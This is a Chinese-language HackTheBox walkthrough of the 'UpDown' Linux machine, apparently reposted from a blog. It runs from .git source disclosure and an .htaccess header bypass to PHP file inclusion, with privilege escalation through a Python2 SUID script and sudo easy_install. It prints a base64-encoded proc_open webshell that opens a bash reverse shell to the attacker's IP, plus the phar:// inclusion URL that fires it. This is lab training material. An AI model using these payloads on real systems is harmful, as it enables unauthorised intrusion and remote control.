HackTheBox - Medium - Linux - UpDown

2024-01-07 20:02:13

UpDown

UpDown 是一台中等难度的 Linux 机器,暴露了 SSH 和 Apache 服务器。在Apache服务器上,有一个Web应用程序,允许用户检查网页是否已启动。服务器上标识了一个名为“.git”的目录,可以下载以显示目标上运行的“dev”子域的源代码,该子域只能通过特殊的“HTTP”标头访问。此外,子域允许上传文件,导致使用“phar://”PHP 包装器远程执行代码。Pivot 包括将代码注入“SUID”“Python”脚本,并以“开发人员”用户身份获取 shell,该用户无需密码即可使用“Sudo”运行“easy_install”。这可以通过创建恶意 python 脚本并在其上运行“easy_install”来利用,因为提升的权限不会被丢弃,从而允许我们以“root”身份保持访问权限。


外部信息收集

端口扫描

循例nmap

file

Web枚举

80

file

看到这个,我下意识的去扫了一下vhost,我觉得可能会打SSRF

file

经典403

file

在主站,开了debug之后会返回响应

file

并且输入还有过滤

file

对主站目录扫描发现了/dev

file

对/dev再扫能发现.git

file

直接跑githacker

file

这是dev子域的源码

file

.htaccess,只允许设置了Special-Dev请求头的访问

SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header

设置请求头后访问dev子域

file

在burp中设置请求头

file

浏览器访问dev子域

file

Foothold

回去看源码,先看index.php

<b>This is only for developers</b>
<br>
<a href="?page=admin">Admin Panel</a>
<?php
	define("DIRECTACCESS",false);
	$page=$_GET['page'];
	if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
		include($_GET['page'] . ".php");
	}else{
		include("checker.php");
	}	
?>

这我咋一看,可以尝试之前的iconv包装器

file

打成功了,只是有disable functions,连mail和error_log也禁了,thm祖传打法打不了

file

把phpinfo保存到文件

┌──(ming👻m1n9k1n9-parrot)-[~/linux-tools_and_exp/dfunc-bypasser]
└─$ python3 ./dfunc-bypasser.py --file ../../pi.html           1 ?
...
...
Please add the following functions in your disable_functions option: 
proc_open
If PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socket

proc_open可用

iconv生成的code太长了,会414

在上传文件的时候,上传zip它会报错,导致最终没有删除掉文件,再利用index.php的文件包含,phar伪协议来利用它

cmd.php

<?php proc_open(base64_decode('L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE4Lzg4ODggMD4mMSIK'),array(),$something);?>

file

上传之后通过phar访问

?page=phar://uploads/95f5ffb7f5709c9a5c9eae5faf0795d5/shell.txt/shell

file

本地横向移动

在developer家目录发现www-data组可读的dev/

file

file

.py

file

这是python2的代码,在老python2中,input并不像python3一样会将任何输入转换为str,所以也就导致了它可以code注入

加上已经打包好的二进制文件是具有developer的suid的,所以直接bash

file

本地权限提升

sudo -l

file

strings发现是个python

file

垃圾桶

file

无脑提权

file

文章来源:https://blog.csdn.net/qq_54704239/article/details/135442413
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。